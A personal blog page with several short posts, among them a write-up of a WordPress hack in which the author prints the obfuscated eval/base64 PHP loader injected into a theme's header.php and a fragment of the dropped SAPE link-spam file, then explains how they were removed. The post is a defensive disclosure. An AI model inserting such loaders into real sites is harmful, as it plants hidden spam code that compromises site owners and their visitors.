I have much bemoaned the loss of Etherpad to the Google. The project was open sourced so, in theory, anyone can run an Etherpad server. But it does take a little bit of nerd accumen to get the thing going. I’ve heard of a couple groups that have started servers… PiratePad, TypeWith.me, Sync.in, EtherPad Foundation, iEtherPad.com. But I’ve been wary of trusting most of these guys. I mean, come on, I’m going to write semi-confidential things on PiratePad?
Here’s one I think I can trust:
etherpad.mozilla.org:9000
My WordPress blog had been hacked. It displayed ads for stupid things in the far lower right corner of some blog pages. It looks like it displayed ads on just 1 in 10 of my pages, especially “Category” pages. You might want to take a peek on your own WordPress blog to make sure it hasn’t happened to you.
Here’s where the bad code was and how I fixed it.
The header.php file of my theme had been altered. It began:
<?define('USE_DIRA', '/blog/wp-content/themes/default/images/'); @eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9zdGFydCgiY2FsbGJhY2siKTs="));?>
That code was obviously running code in my /blog/wp-content/themes/default/images/ directory.
Curiously, the “modified date” on the header.php file must have been hacked. I know this because the file has a “last modifed” date of April 2009, however the backup of my website in October 2010 doesn’t have the spamming code. Therefore, the hacked code must have been added more recently.
2 files had been added to the /blog/wp-content/themes/default/images/ directory on the blog:
403.php
links.db
Here are the most suspicious parts of 403.php
define('_SAPE_USER', '466c19cd8253185aebaab9f182431010');
...
eval(@base64_decode("JGJvdGlwcyA9IGFycmF5KAkN
“SAPE” is a known malware (via)
You should never have any “eval base64” code in your WordPress installation. It’s almost always some piece of code trying to hide itself.
————————————————–
I removed the malicious code from my header.php and deleted 403.php and links.db from the default theme. Done.
Update: read the comments!
Darn it, this blog, Lee.org was hacked by spammers. On about 1 in 10 page loads to some of my Category pages, I see links at the very bottom of the blog page to places like this:
http://trixi.com.uaSPAM/index.php?categoryID=1485
playstation 2 киев
and
http://atlantika.com.uaSPAM/brands/43/
muscletech атлантика Ðлитный Ñалон Стелла предоÑтавлÑет тонизирующий
http://body.com.uaSPAM
ÑротичеÑкий маÑÑаж
недорого
I inserted the word “SPAM” to obfuscate it.
I’m working at finding the rogue code now.
I am considering a change of career to become a radiation therapist or similar medical technician. If you know about this field, I would be indebted to you if you’d let me speak to you about it.
Update 12-1-11: This program is permanently on hold as I don’t have AT&T residential service anymore.
If you are signing up for new AT&T services, I’ll split the referral fee I get with you via the Rewards for Referrals program!
AT&T will send you a gift card for $25 for each service you sign up for of U-Verse TV, U-Verse high speed internet, or U-Verse voice! AT&T will send me a gift card too, because, well we’re friends!
Here’s how to do it:
- Go to this page to tell me your name and email address
- In a day or so AT&T will send you an email indicating that I nominated you for the referral program.
- Go ahead and sign up for the AT&T services you were going to sign up for
- Email me your new U-Verse account number. My email address is Lee at Lee daht org.
That’s it. In about 6 weeks AT&T will send both you and I a gift card for $25 for each service you signed up for… up to $75 if you sign up for all 3 U-Verse services!
You can find out all the details about the program at refer.att.com
Oh and if you sign up for regular AT&T high speed internet, or wireless, or DirectTV, or home telephone service, AT&T will give me $25… and I’ll split it with you… I’ll Paypal you $12.50.
Phew! What a list! Here is part 3 of 3 of the Burning Man 2011 Resource Guide. You should start with part 1
Services
Continue reading ‘Burning Man 2011 Resource Guide — Part 3 of 3’ »
Part 2 of 3 of the Burning Man 2011 Resource Guide. Start with part 1
————————————————–
Playa Wear
Continue reading ‘Burning Man 2011 Resource Guide — Part 2 of 3’ »
Every year Burning Man puts out a guide for buying supplies and such. This year’s list is pretty darn huge so I’ve split it into 3 parts. Here you go! You can find the original listing here.
Be sure to check out the 2010 guide.
Continue reading ‘Burning Man 2011 Resource Guide — Part 1 of 3’ »
